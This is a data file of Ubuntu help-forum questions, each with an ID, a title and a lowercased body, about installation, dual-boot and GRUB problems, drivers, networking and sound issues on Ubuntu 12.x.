263522	installed ubuntu 10.04 on usb - now i need it on an hdd	i 'm undoubtedly a newbie in all this . after reading so many reviews and pushed by a moody pogoplug set up at home ( for backing up data and streaming of files ) , i tried to make my laptops and ipad become reliant on a brand new hp n36l microserver ( amd athlon core duo , 8gb ram ) , 2x2tb wd20earx hdds and one kingston svp200s3/120g 120 gb , internal ssd to act as the main booting drive . unsurprisingly , i got it all wrong . my ubuntu installed and runs only from the usb drive i had previously used to install from . and my server can be seen on my home network , but could not be accessed despite the repeated attempts . most probably i might need to install again ? where did i go wrong in all this ? i get the server going through bios then stops with error : error : no such device : 00eaf4-933e-4895-ae66-2f4a44c92fc . grub rescrue > the boot-repair info file is included . update new boot-repair info and log after installing grub on /sda and running boot-repair . please help ( this really sounds like an sos out of a stricken ship in a perfect storm ) . thanks
263523	ubuntu wo n't boot after installed	i installed ubuntu on my compaq cq58 ( pre-installed windows 8 ) with the uefi diabled and with a liveusb . i did the partitions on my pc and used 100gb for ubuntu . ubuntu installed and said that i had to restart so that the installation would be completed but after the restart it showed both windows 8 and ubuntu in the boot menu but when i tried to boot ubuntu it did n't . how can i fix this ?
263529	wifi keeps prompting for password	hey my wifi keeps prompting for the wpa2 password . is there something that i need to do with network manager ? linux version 3.5.0-17-generic ( buildd @ roseapple ) ( gcc version 4.7.2 ( ubuntu/linaro 4.7.2-2ubuntu1 ) ) distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 )
263536	how do i install novacom in ubuntu 12.04 ?	i have been attempting to install android os on an hp touchpad running the webos system.i m pretty much a newbie at this but i ve been trying to install the novacom driver into ubuntu and dont think i m doing it right ... has anyone done this before ? can you tell me the simplest way to install novacom into ubuntu 12.04 because i m just not achievinh it i feel.it keeps telling me i ll see a palm , inc folder when the driver is installed correctly but i dont see that folder.also after downloading it and doubleclicking the package i havent yet got the option to install it ... i attempted once to hook the hp touchpad by usb after what i thought was a correct novacom install but the computer didnt recognize the touchpad so it couldnt have been right.any help is much appreciated.i m running ubuntu 12.04 64bit
263537	help ubuntu 12.10 and windows 8 dual-boot on ssd	i want to slowly migrate my os from the mess that 's windows 8 to ubuntu , but i still want to have win8 for the time being . my system is : i7 3770k , g. skill ripjaw x 8gb 2133mhz ram , crucial m4 256 gb ssd ( gpt formatted ) , 2tb seagate barracuda , evga ftw 670 , asus p8z77-v pro board ( uefi configured ) , cm modular 850w psu , lg bh-12 bluray drive , windows 8 x64 uefi already installed . my main question is , how should i go about installing ubuntu , i would prefer to have it run on the ssd on which i already have win8 installed . i have read on a tutorial , that ubuntu has problems with running next to win8 on an ssd , is this true ? should i run ubuntu on the 2tb hdd ( which i rather not due to performance differences ) . if running on the ssd , how much space of the ssd should i allocate to ubuntu ( currently 120gb free space ) ? how should i partition the ssd or hdd depending on which to use . i read on this forum that ubuntu will wear off the ssd if i do n't tweak some stuff , what are those tweaks ? are there any settings or things i should consider in the bios ? i have looked around for intel rapid technology and could n't find it , no info on asus website either . what other things should i consider ? my memory is currently set manually to run on 2133 mhz , is that okay for ubuntu 12.10 ? also i ran ubuntu from the install dvd to see if it works , and i had issues with the dual monitor setup main monitor samsung 24 '' ( 1920*1080 ) secondary monitor samsung 17 '' ( 1280*1024 ) .when i turned both monitors on to their native resolution in ubuntu , they both lost signal .
263539	can only login as guest after installing the first time 12.04 .	i can not sudo any commands as i have no permission , not even get connected to the internet . i am installing 12.04 using wubi on windows 7
263543	fstrim does not work	i have a thinkpad x60s with an osz agility ssd . i use ext2 . i read that i should execute the trim command from time to time , however , this command does n't work on my machine : boris @ boris-thinkpad-x60s : ~ $ fstrim / fstrim : / : fitrim ioctl failed : inappropriate ioctl for device what will be the consequences of me not using it ? will it affect speed , ssd life etc ? why is n't the command working and what are the possible solutions to get it working ?
263544	changes in gui behavior after update	[ ubuntu 12.04 32-bit , unity 5.18.0 ] on friday morning i installed the recommended software updates , as i always do ( list included at the end of this message ) . the next day , after rebooting , the gui evinced some changes in behavior as follows : launcher icons reverted to larger size ( 48x48 ? ) . and i ca n't shrink them back , because the icon size slider bar in the system settings appearance pane is gone . hitting ctrl-alt- { arrow key } to switch workspaces no longer animates the process ; the transition is instantaneous . holding down the super key no longer brings up the pane of all the keyboard shortcuts ; it brings up the shortcut numbers over the launcher icons , and stops there . hitting super-w no longer does that mac os x exposăš-style `` show all windows '' trick . the alt-tab behavior for switching windows is much less flashy now . the row of icons is much smaller . it shows one icon per window , instead of one per application . pausing over an app icon used to make it expand into all the windows the app had open ; that behavior is gone . while alt is held down , it does show a white outline of whatever window is selected . none of this is important . but it seems that some or all of these differences resulted directly from the software updates , so i 'm curious & in general would like to improve my understanding of what these packages do . thanks in advance . friday 's updates are listed below , as promised . cat /var/log/dpkg.log | grep -i status\ installed 2013-03-01 11:26:56 status installed libssl1.0.0 1.0.1-4ubuntu5.7 2013-03-01 11:26:57 status installed libc-bin 2.15-0ubuntu10.3 2013-03-01 11:27:42 status installed man-db 2.6.1-2ubuntu1 2013-03-01 11:27:42 status installed ureadahead 0.100.0-12 2013-03-01 11:27:43 status installed bamfdaemon 0.2.124.2-0ubuntu1 2013-03-01 11:27:43 status installed desktop-file-utils 0.20-0ubuntu3 2013-03-01 11:27:43 status installed gnome-menus 3.4.0-0ubuntu1 2013-03-01 11:27:45 status installed libdbus-glib-1-2 0.98-1ubuntu1.1 2013-03-01 11:27:45 status installed libgl1-mesa-dri 8.0.4-0ubuntu0.4 2013-03-01 11:27:46 status installed libglapi-mesa 8.0.4-0ubuntu0.4 2013-03-01 11:27:46 status installed libgl1-mesa-glx 8.0.4-0ubuntu0.4 2013-03-01 11:27:47 status installed libxatracker1 8.0.4-0ubuntu0.4 2013-03-01 11:27:47 status installed libglu1-mesa 8.0.4-0ubuntu0.4 2013-03-01 11:27:48 status installed sudo 1.8.3p1-1ubuntu3.4 2013-03-01 11:27:48 status installed openssl 1.0.1-4ubuntu5.7 2013-03-01 11:27:49 status installed firefox 19.0+build1-0ubuntu0.12.04.2 2013-03-01 11:27:50 status installed firefox-globalmenu 19.0+build1-0ubuntu0.12.04.2 2013-03-01 11:27:50 status installed firefox-gnome-support 19.0+build1-0ubuntu0.12.04.2 2013-03-01 11:27:50 status installed firefox-locale-en 19.0+build1-0ubuntu0.12.04.2 2013-03-01 11:27:51 status installed xserver-xorg-video-nouveau 1:0.0.16+git20111201+b5534a1-1build3 2013-03-01 11:27:51 status installed libc-bin 2.15-0ubuntu10.3
263547	a january 2013 ubuntu update broke my wi-fi !	in late february 2013 i installed the latest updates on my ubuntu 12.04 system ( an asus eee 1215t ) , rebooted , and after that it was no longer able to make a network connection over wi-fi . it just repeatedly asks me for the wpa password . i enter it , but the connection is not made and it asks for the password again . i have made no changes to the wi-fi router for at least 6 months , and other wi-fi devices i have still connect without trouble . the only thing that changed was the ubuntu update . update : after some digging , i have found the problem and a solution . close reading of /var/log/syslog revealed that the computer was connecting to the wi-fi router without trouble , but it was failing the dhcp negotiation . read my answer below for details , as soon as this question gets reopened . : ) i 'm leaving my old information in the question for reference , in case anyone finds it relevant . btw , for those that marked my question as a duplicate , i think it is n't . while the solution in the purported duplicate question 's answers might have worked ( i did n't try it ) , mine was a new problem introduced by a january 2013 ubuntu update , and not the classic broadcom problem reported in 2012 , and it was solved with a different method . dmsg shows the device as a bcm4727 : $ dmesg | grep -i bcm [ 20.632433 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) but lshw shows it as a bmc4313 : $ sudo lshw -c network pci ( sysfs ) *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : 48:5d:60:6d : d8:59 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : fbefc000-fbefffff the specifications page does not make the wi-fi chipset clear , unfortunately . in case it is relevant , here is lsmod : $ lsmod | grep wl wl 2906597 0 cfg80211 178877 1 wl lib80211 14040 2 lib80211_crypt_tkip , wl i tried removing and reinstalling the broadcom sta wireless driver through system settings -- > additional drivers , but that did n't help , even after a reboot . the page wifi problem after ubuntu 12.10 update has some promising suggestions in its accepted answer , but seems to be specific to 12.10 and the bcm4312 , not my ( possibly ) bcm4313 . any suggestions ?
263548	what kind of photo-editing software can be used in ubuntu ?	what kind of photo editing software can i use for ubuntu ? does ubuntu support photoscape ? i 'm more familiar with this .
263550	opengl with intel 82865g integrated graphics	there 's a similar question on the site , but it 's outdated and does n't specify exactly what i 'm faced with . namely , i have an old computer that i 'm fixing for someone , and it 's got this intel 82865g integrated graphics controller . the problem is that it does n't appear to handle any opengl things i throw at it . for instance , glxgears returns this : x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 3 ( x_glxcreatecontext ) serial number of failed request : 28 current serial number in output stream : 30 and glxinfo returns the same . the computer runs ubuntu 12.04 in unity 2d . the graphics card is capable of up to opengl 1.3 according to intel , if that is at all relevant .
263558	ubuntu for mechanical engineering	i 'm studying mechanical engineering ( 3rd year ) and i 'm new to ubuntu . how can make the best use of it in my field ? is it helpful in anyway for mechanical engineers better than windows ? if so , how ? and suggest me ideas please .
263559	delete lines starting with pattern from a file	i tried several commands : tr , sed but to no avail . here 's the file : > ... > ... > seteps ( ) > postscript ( 'images/boxplot_default.eps ' ) > ... > ... i want to delete those two undotted lines . something simple like / > seteps\ ( \ ) \n/ would do .
263567	set web proxy using pac-file-url in lubuntu	i want to use a pac-file-url to set the web proxy rules for chromium in lubuntu . chromium reads its settings from the system wide os settings . i read how do i set systemwide proxy servers in xubuntu , lubuntu or ubuntu studio ? but i am not clear on the following question . how do i specify the pac-file-url in the system wide settings in lubuntu ?
263569	why swap is used when loads of memory is free ?	i have 4gb of ram , and an 8gb swap partition available . sometimes i like to see how much memory is used at particular points . and i noticed , that sometimes there is small amounts of swap used ( ~200kb ) , although the real memory i have not seen exceed 1gb ever . of course i realize that this is not an issue most of the time , as 200kb is like a glass of water in the ocean . is it just a reporting error ? cause once i was running ubuntu from livedisk , and it was showing that it was using a lot of swap.. but when you run in livedisk ubuntu wouldnt have swap available ? ( or at least you 'd hope it would n't just start writing stuff into a hardrive og host pc ? ) . although there was a swap partition in that machine , could livedisk use it ? ?
263571	automatic hyphenation software	resulting from a discussion over at the graphic design stackexchange site about if and how to justify text it is generally concluded that justification is preferred if the text is hyphenated in a proper way ( to avoid whitespaces and rivers ) . the related questions are justification and hyphenation without proper time and tools ? readability and appeal of justified text does hyphenation increase legibility ? an answer to the first link suggests latex but i wonder if there are other programs or tools ( for example an extension for libreoffice ) to hyphenate text .
263572	can i use wifi and cable ( ethernet ) networking at same time ?	i am on an intranet that is not connected to the internet and a wifi router with connection to the internet . when am connected to the router , i can browse the internet but can not browse my lan with my ethernet cable connected . how can i browse the internet via my wifi router and at the same browse my local lan web app via my connected ethernet cable ?
263575	problem with microphone sound when using skype 4.1 . 0.20 on ubuntu 10.04.4	i have ubuntu 10.04.4 installed in my machine ( acer 3810 t ) . with some recent kernel update ( present kernel is 2.6.32.46 ) there is a problem with the microphone sound when i am using skype . while making calls , i am able to hear the person on the other side , however i am not audible to the contact . this problem started when there was a kernel update from 2.6.32.43 to 2.6.32.45 . i have searched the different forum questions where suggestions have been made to make pulseaudio volume the default for skype . i have install the above mentioned sound mixer , however still the problem remains . the audacity recording tells me that the system microphone is otherwise fine . hence right now i am clueless as to what might be the problem and the only thing i can conclude is there some bug in the recent kernel updates that i made . any immediate suggestion for solving this issue would be of much help !
263576	why does wireless function key not effect the wireless card but only bluetooth ?	my wireless card is switched off at start up of my computer and i can not switch it on with function key . it only switches on or off the bluetooth instead . is there any other key that opens the wireless that is not shown like the keyboard on my laptop or is there any other problem about the settings ?
263577	how to install additional drivers for amd graphics ?	i am running ubuntu 12.10 mainly because i want to try steam on it . i am trying to update it and such to get it to working condition . updating the software worked just fine . however , when i tried to get to the update manager , the only option that came up was `` software updater '' even when i typed in the search bar `` update manager '' i got no results just software updater . i also tried to install my amd graphics card ( driver ) and everytime i tried to install it i get this ... sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log how do i resolve this ?
263579	will re-installing `` gnome session fall back '' fix that applet error ?	after login i often get the error applet complete has quit unexpectedly . ubuntu 12.10 64 bit 3.5.0-24-generic 12 gb ram 1 tb hdd when the message appears on boot up it always provides the option to reload , once that happens all is well . message occurs 1 -2 a week .
263580	how to make a proper ubuntu/windows 8 dual-boot using the metro bootloader ?	i 'm the owner of a uefi pc and i would like to make a new setup of windows 8 and ubuntu 12.10 both in x64 . i ' do n't know if that 's possible , i 've made some searches , i 've followed some tutorials like dual boot win8 and ubuntu on uefi hardware but it did n't work . so what 's the best partition scheme and the different steps to get the same result as the previous tutorial ?
263583	using libreoffice impress remote app without bluetooth ?	i 've just downloaded libreoffice impress remote and got libreo 4.0 . my problem is that i ca n't connect the phone to impress , my laptop does n't seem to have bluetooth . anybody know how to solve this ? ( using ubuntu 12.10 )
263587	how to load hdd lazily ?	i have a laptop with an ssd and an hdd . i tend to use the ssd only . on windows 8 when i do n't use the hdd for a few minutes , it goes idle and the laptop is completely silent , because ssd makes no noise . however , on ubuntu the laptop is constantly making noise , which suggests that the hdd is active even though i do not use it . is there a way to make ubuntu lazily load the hdd ? i like it when my laptop is silent and energy efficient .
263589	12.04 lts 64 bit - login screen - broken pipe / no graphical interface	for two times , i did a clean install on my notebook ( which as an ndvidia gt610m gpu ) , and for both times i did the following : 1 - check for updates / install 2 - reboot 3 - apt-get install audacious open-jdk7 pidgin deluge wine ntfs-config 4 - reboot in both times , after the reboot i get : `` unable to write pipes , broken pipe '' , and then after another reboot , i just do not have graphical interface ( just the command line ) . what can i do ? i checked some similar questions but found no usefull response .
263594	wubi installation stuck after `` cpu interrupts balancing daemon [ ok ] ''	i have a gateway lt4004u with an intel atom dual core 1.6ghz processor ( n2600 ) with built in gma 3600 series . when i try to install ubuntu with the run alongside tool ( wubi ) after it dowloads ubuntu and once i restart the system it goes through the text and all but after it says cpu interrupts balancing daemon [ ok ] or what ever it says it gets stuck . how do i fix this ? any help would be appreciated , thanks .
263600	ca n't install nvidia-experimental-310	i went using the gui at first ( software sources - > additional drivers ) , it installed without any problem , but when restarting and running sudo lshw -c display i still get this : *-display descripción : vga compatible controller producto : g96 [ geforce 9500 gt ] fabricante : nvidia corporation id físico : 0 información del bus : pci @ 0000:01:00.0 versión : a1 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress vga_controller bus_master cap_list rom configuración : driver=nouveau latency=0 recursos : irq:16 memoria : a2000000-a2ffffff memoria:80000000-9fffffff memoria : a0000000-a1ffffff ioport:2000 ( size=128 ) notice the driver=nouveau part , i tried uninstalling the nvidia driver and reinstalling it on the console ( using sudo apt-get install nvidia-experimental-310 ) and it installed sucessfull but again after rebooting and checking the nouveau drivers keeps coming ... any help ? edit : i managed to install them properly ... but then after rebooting i got stuck at 640x680 res , unity was glitchy and got a black bar at the left of the screen ... i tried with nvidia-experimental-310 , nvidia-experimental-304 , nvidia-current and nvidia-current-updates with the same result .
263601	how do i install gnome classic ( no effects ) only ?	if i do : sudo apt-get install gnome-panel it will include gnome classic with effects , which makes it depend on compiz and etc . that is not desirable for me , as i only want the without effects . how do i do this ?
263603	server edition - login details ?	i 'm new to the os and need some help . so i installed ubuntu server , after solving a lot of problems i 'm stuck on the login page . so i have : ( system name ) login : i remember setting up something and named it : destiny-user and when i get to the password something weird happens . i ca n't enter anything unless i press enter and go to the next line ? thank you for your time .
263606	windows 8 no longer boots after grub wiped out the windows bootsector	i was using win8 and installed ubuntu 12.10 ... there is an entry in grub for w8 , but when selecting it - grub comes back again , so windows never boot up . i can only launch my ubuntu . /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 123086847 61440000 7 hpfs/ntfs/exfat /dev/sda3 123086848 586145789 231529471 7 hpfs/ntfs/exfat /dev/sda4 586145790 976771071 195312641 5 rozszerzona /dev/sda5 586145792 761929727 87891968 83 linux /dev/sda6 761931776 976771071 107419648 83 linux sda2 is windows 8 partition , sda1 is windows swap ( or whatever it names ) . in grub customizer entry for w8 look like that : insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 a456a29b56a26dac else search -- no-floppy -- fs-uuid -- set=root a456a29b56a26dac fi drivemap -s ( hd0 ) $ { root } chainloader +1 sudo update-grub did n't help me : / the a456a29b56a26dac is windows boot ( sda1 ) , windows ( sda2 ) is 0cda0065da004d80 result from bootinfoscript : http : //pastebin.com/bvc9ziq0 show that grub has overwritten the windows 8 boot partition boot sector : sda1 : __________________________________________________________________________ file system : ntfs boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda1 and looks at sector 667401296 of the same hard drive for core.img . core.img is at this location and looks in partition 72 for . no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd is there an easy way to fix it and make windows bootable without reinstalling ? ...
263607	wireless on hp pavillion dv4 not working	i have recently tried to install ubuntu 12.10 x64 over x32 and it installed , but now the wireless wo n't work . i have a bcm 4312 card for the wireless . i 've tried pressing the wifi button on the computer , but it just stays orange . also , i 've tried a lot of different things and `` wl '' is non existent on my computer . i 'm still trying to get the hang of this , so please explain and help ! update : so , it turns out i just needed to update my kernel to 3.8 . i followed the instructions found at this thread : why has wireless disappeared after my 12.10 upgrade ?
263608	having trouble getting 12.10 to work with my newly built pc . i think the problem is with the graphics	edit : i know that i am generally ignorant of linux and computers in general , but i did do a lot of research on my own before asking for help . i use an amd a10-5800k apu with radeon hd 7660d so far , i 've got ubuntu installed but i 've had to insert `` nomodeset '' when booting or otherwise the screen becomes extremely squished and jittery . i could edit the grub file in etc/default to fix that problem , but there 's no resolution option for my display so i still would n't be able to use the default driver . i tried the two alternative drivers in the additional drivers tab in software sources ; they did n't require nomodeset and had much more acceptable ( but not perfect ) resolution options , but they broke unity . i tried installing amd 's latest stable catalyst driver with an installation program i found online , but that did n't appear to do anything but `` break packages '' ( not sure what that means , but it sounds bad ) . also , compiz crashes multiple times when i first run software updater after an install . i just did a fresh install and did the nomodeset thing at boot , but have done nothing else .
263609	how can i install ubuntu ( not wubi ! ) without delete windows	i want to install ubuntu without wubi ... but i am afraid to delete windows . pls help . ps : sorry for my bad english i am from germany .
263614	no unity launcher	i have ubuntu 12.04 and was trying to install updates . big mistake because the next thing i know i just have a blank wallpaper screen and nothing else . i 've tried every piece of advice given on various post ( unity -- reset , ccsm ) nothing works . also , none of my usb ports are working either and seriously have no idea what that 's all about .
263616	installing program on ubuntu pen drive	i have installed ubuntu in my pen drive & i use my pen drive as my computer & i install some application on this ubuntu but when ever restarted my ubuntu operating system my installed applications were removed . please ... ! can any buddy tell me how can i save the applications which are installed on my ubuntu pen-drive ... ?
263618	ca n't access grub menu by holding shift	i need to be able to set the nomodeset flag for the system to boot correctly , however pressing and holding shift after the boot screen does not give me access to the grub menu . i need to point out this is not a dual boot system . is there anyway to do this ? i have also tried pressing space , f1 , and f8 .
263620	no sound on sony vaio after update to ubutu 12.04	after an update to unbuntu 12.04 , the sound is now off . with rhythmbox , i can barely hear the songs playing with the headphones connected , but nothing with the internal speakers . i have a sony vaio pcg-7v2l with the following sound card hardware : $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ cat /proc/asound/card0/codec* | grep codec codec : sigmatel stac9872ak codec : conexant id 2bfa the first thing i tried was to run alsamixer and the sound settings for volume control or mute being set . everything looks normal and nothing muted . i then updated the sound drivers on 03/03/2013 and rebooted : sudo add-apt-repository ppa : ubuntu-audio-dev sudo apt-get update sudo apt-get dist-upgrade i added 'options snd-hda-intel index=0 model=vaio '' to the end of /etc/modprobe.d/alsa-base.conf i also tried adding model=auto and model=generic to alsa-base.conf . and i also tried killing pulseadio . with : sudo killall pulseaudio ; rm -r ~/.pulse* does anyone have any solutions to this problem ? thanks .
263621	ubuntu crashes constantly and is upset with my video card . what can i do ?	i knew i should n't have gone for the updates . but i did . and now my lovely ubuntu keeps on fighting with my graphics card - or so it seems from my point of view . if i - read a up-to-480p video - or - dare visiting a flash website - i get a ( very short ) freeze , with this crash report coming up again and again . report says : executable path /usr/share/apport/apport-gpu-error-intel.py package xserver-xorg-video-intel ( not installed ) problem type crash etc etc distrorelease ubuntu 12.04 i have it all but do n't know what i should check in order to solve this . if anyone knows what it 's about , please let me know ! thanks in advance , denise
263626	grub missing after removing drive with ubuntu	my work laptop is an hp elitebook with one hard drive in it . on that hard drive is a encryption program that boots up called `` safeboot '' , you enter your username and password and then windows boots up . wanting to use this for personal use i removed the cd drive and installed a 2nd hard drive bay instead . on the 2nd hard drive i loaded linux mint 14 and was using it for months . then i wanted to try ubuntu 12.10 so i partitioned the 2nd hard drive and installed 12.10 . now when booting up if i choose to boot from the first hard drive it goes straight into the grub boot loader . if i remove the 2nd hard drive and boot up it says grub is missing . any thoughts ?
263635	is it possible to install ubuntu touch on a pc ?	i want to install ubuntu touch on pc . they already have preview version here - > wiki.ubuntu.com/touch/install . and some downloads here - > cdimage.ubuntu.com/ubuntu-touch-preview/quantal/mwc-demo/ 1 - can i do that ? 2 - and how ? why ? because i want to try it , but i do not have any nexus devices ( and i do n't want to buy it ) . yes it 's possible to run ubuntu toch on pc ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! 1 ) see in action here - > www.youtube.com/watch ? v=r4gxaf08gti 2 ) instruction here - > http : //unity.ubuntu.com/getinvolved/development/unitynext/ name of this project is unitynext . now i try to install it but i get error . can anybody help me ? after command $ ./build -- found lcov : /usr/bin/lcov -- found gcovr : /usr/bin/gcovr -- checking for one of the modules 'hud-client-1' cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:363 ( message ) : none of the required 'hud-client-1 ' found call stack ( most recent call first ) : tests/qmluitests/qml/hudclient/cmakelists.txt:8 ( pkg_search_module ) -- checking for one of the modules 'hud-client-1' cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:363 ( message ) : none of the required 'hud-client-1 ' found call stack ( most recent call first ) : plugins/hudclient/cmakelists.txt:5 ( pkg_search_module ) -- configuring incomplete , errors occurred ! make : *** не задані цілі і не знайдений make-файл . зупинка .
263637	how to evaluate an arithmetic expression in an `` if '' statement ?	this is my script : # ! /bin/bash num=1 while [ $ num -lt 100 ] do if [ $ num % 3 -eq `` 0 '' ] then echo `` fizz '' elif [ $ num % 5 -eq `` 0 '' ] then echo `` buzz '' elif [ $ num % 3 -eq `` 0 '' ] & & [ $ num % 5 -eq `` 0 '' ] then echo `` fizzbuzz '' else echo $ num fi ( ( num++ ) ) done it keeps saying bash : [ : too many arguments .
263642	veetle plugin - error `` unable to play two streams simultaneously - mac can not have two channels open in separate browsers ''	i 'm running ubuntu 12.10 64bits , after a lot of research i finally managed to install the veetle plugin on my firefox browser ( i was having trouble because the default i was trying to install was for the 32 bit version ) . anyway , i finally installed it , it shows up on my firefox plugins , but when i try to open any stream on the website ( veetle.com ) , my browser freezes and i get an error message * '' unable to play two streams simultaneously - mac can not have two channels open in* *separate browsers '' * it stops the broadcast with that message ( and yes , i 'm only watching that broadcast , not trying to watch it in different browsers / tabs , etc. ) . anyone can give me a hand here ? thanks in advance !
263648	how can i recover my old windows 7 after ubuntu installation ?	my os is/was windows 7 , and i installed ubuntu to lean a bit about linux systems . after the installation i booted the computer and found i had no windows access and i fear i have lost all my windows data . how can i recover the old windows 7 and boot into it ? or a the very least recover my windows 7 files . i am a complete linux novice so possible solutions will need to be simple .
263658	trying to install ubuntu on mac . black screen of death	there is no purple screen . straight to black screen with endless blinking cursor . all of the solutions to this black screen suggest that i see a purple screen before this black one . is there a way to set nomodeset without pushing f6 at the purple screen . i believe i may need to do this but do n't know how . thanks .
263661	radeon ! driver activated but not in use [ ubuntu 12.04.2 lts , x64 ]	radeon ! driver activated but not in use [ ubuntu 12.04.2 lts , x64 ] sysinfo : vesa : wrestler notebook : amd msi cr650 , amd e-450 , hd6320 , 4gb ram
263664	maas on ubuntu server 12.10 - node autodetect not enlisting	when i use the ubuntu server boot media to enlist a new it does not update in the web ui . there is not a /var/lib/tftpboot/pxelinux.0/ directory . and even if i add the node manually via the web ui , with out the tftpboot dir there is no pxe action . just a vanilla install of ubuntu 12.10 on a couple old computers , i had the 12.04 server up and maas nodes connected and bootstrapped on the same hardware . just trying to go to 12.10 . i am a novice , but i have ran down a lot of the info on the net so far . i have the quantal images maas-import-pxe-files'ed and the web-ui says the region controller is all good . i am wondering about any trouble shooting steps i can take to find the tftpboot and or pxe communication issue . thank you .
263666	trying to upgrade from 12.04 lts x64 to 12.10 but it does not appear	trying to upgrade from 12.04 lts x64 to 12.10 but it does not appear following directions on the ubuntu.com website . kindly point in right direction . thanks .
263667	sudo : maas-import-pxe-files : command not found	i installed ubuntu 12.04 maas and tried to run sudo maas-import-pxe-files command as directed in the documentation , but i get the following : sudo : maas-import-pxe-files : command not found how can i run ( sudo maas-import-pxe-files ) ? i 'm connected to the internet and i 'm the admin of the machine .
263669	make dynamic-size ntfs truecrypt volume	when creating a new volume in truecrypt , i do n't have the option to make it dynamically allocated . i researched the issue and found out that it has to be done on an ntfs filesystem during creation . i 've found hundreds of resources telling me how to mount an existing ntfs volume or how to format one after creation , but i truly need it dynamically allocated . any advice whatsoever ?
263670	sudo does n't work on ro filesystems	when for whatever reason my home partitions gets mounted read-only , sudo fails : /usr/bin/sudo : input/output error from what i understand , it seems to be trying to touch ~/.sudo_as_admin_successful is there a way around this , to use sudo to remount my harddisk ? should i file a bug ?
263671	fix bootmgr from ubuntu ?	i installed ubuntu 12.10 on my computer and decided to go to windows xp . i inserted the reinstall cd and it just says : bootmgr missing , click ctrl+alt+del to restart . the same thing happens with windows 7 . i 'm assuming that the bootmgr needs to be restored/repaired but i do n't know how to do that in ubuntu . i 've read many articles that say to insert the install cd and use the command prompt but seeing as i ca n't even load the cd that is a problem . so basically my question is , how do i replace/reinstall the bootmgr through ubuntu ?
263675	is swap memory required on a flash drive installation ?	i have ubuntu 12.10 installed on a 16gig flash drive without a swap partition . i heard from many users that skipping swap on installing ubuntu on flash drives extends the speed and life of a flash drive significantly ( kingston cs says they 've yet received flash drives `` worn out '' from installed os use ) . my flash installation runs very well , though sometimes there is some sluggishness with firefox working with image laden sites , or with gimp , but i do n't know whether to fault that specifically to swap . on the whole there are no crippling performance issues . my question is would there be any real performance improvements had i installed swap ( since i might format another ubuntu flash drive ) ?
263683	during an installation typed sudo dmraid -e -r /dev/sda , now windows 8 can not start	during my installation of ubuntu from a usb drive it could n't detect my hard drive . i researched and learned that if i deleted my raid ( or whatever sudo dmraid -e -r /dev/sda does ) then ubuntu would detect the hard drive . it worked ! however , when i try to start windows 8 i get a message at startup saying that one of my drives ( raid0 ) is disabled and then windows 8 crashes . windows 8 tried to fix the problem but it could n't . is there anything i can do to fix this ?
263684	how do i add qtdeclarative to the pkg-config list	i installed today the libqt5 and qtquick development stacks . in trying to also install the hsqml packages for haskell , hsqml reports that qtdeclarative is not listed in pkg-config . however , i have installed libqt5declarative5 and found both an i386 and x86_64 version of libqtdeclarative.so.4.8.1 on my filesystem . so , how do i get pkg-config to add those files to the listing so that other applications can find them ?
263689	installing a brother mfc-240c on 12.10	i recently installed ubuntu 12.10 , 64-bit , with encryption , on my laptop . i 've got an old brother mfc-240c that 's connected via a usb port . i was able to locate the appropriate drivers on the brother web site : mfc240clpr-1.0.1-1.i386.rpm and mfc240ccupswrapper-1.0.1-1.i386.rpm and install them . my laptop sees the printer , and detects when i unplug it or turn it off , but when i try to send print jobs to it , it does n't respond . the printer worked fine when i had windows installed on my laptop , so i know it 's not that . has anyone run into this problem ? any pointers would be helpful .
263690	headphone jack disabled in windows , after using ubuntu	i installed ubuntu 12.10 on my alienware m15x-r1 and love it , but whenever i properly shut down or reboot from within ubuntu , when i access windows my headphone jack does n't work , it reads headphones are plugged in but it does n't send sound , essentially it 's muted . this was n't happening before ubuntu . the jack works fine in ubuntu . all drivers are updated . when i manually force shut down with my power button , the headphone works , so ubuntu is somehow muting my jack when shutting down . is there anyway to prevent this or not allow ubuntu access to windows privileges ? something ? i love ubuntu and plan on continuing to use it , but manually shutting down each time is going to be a pain and is really only a temporary solution , any help is greatly appreciated !
263692	unattended-upgrades not running , /etc/cron.daily/apt missing	i have automatic-upgrades installed and configured , but it never seems to run , because there are always security updates waiting to be installed when i check . https : //help.ubuntu.com/community/automaticsecurityupdates seems to imply that /etc/cron.daily/apt is the mechanism by which automatic-upgrades works . however , /etc/cron.daily/apt is missing . dpkg -s indicates that apt owns that file . am i correct that a missing /etc/cron.daily/apt would prevent unattended-upgrades from running ? if so , how would i create it ? ( i 'm not the only one with this problem , as evidenced by this ubuntu forums post , which unfortunately does n't have a solution . )
263698	how to dual boot with 12.04 and windows vista	i tried to do a dual-boot install of 12.04 on a machine running windows vista . i get no option of booting ubuntu , and windows will try to boot but fail . i selected windows as the default os in advanced option . i tried running boot-repair , which said it ran successfully , but no luck . it returned a url of http : //paste2.org/p/3036785 i would really like to recover the ability to run vista , but as a last resort will try a clean install of ubuntu 12.04 . how do i resolve this ?
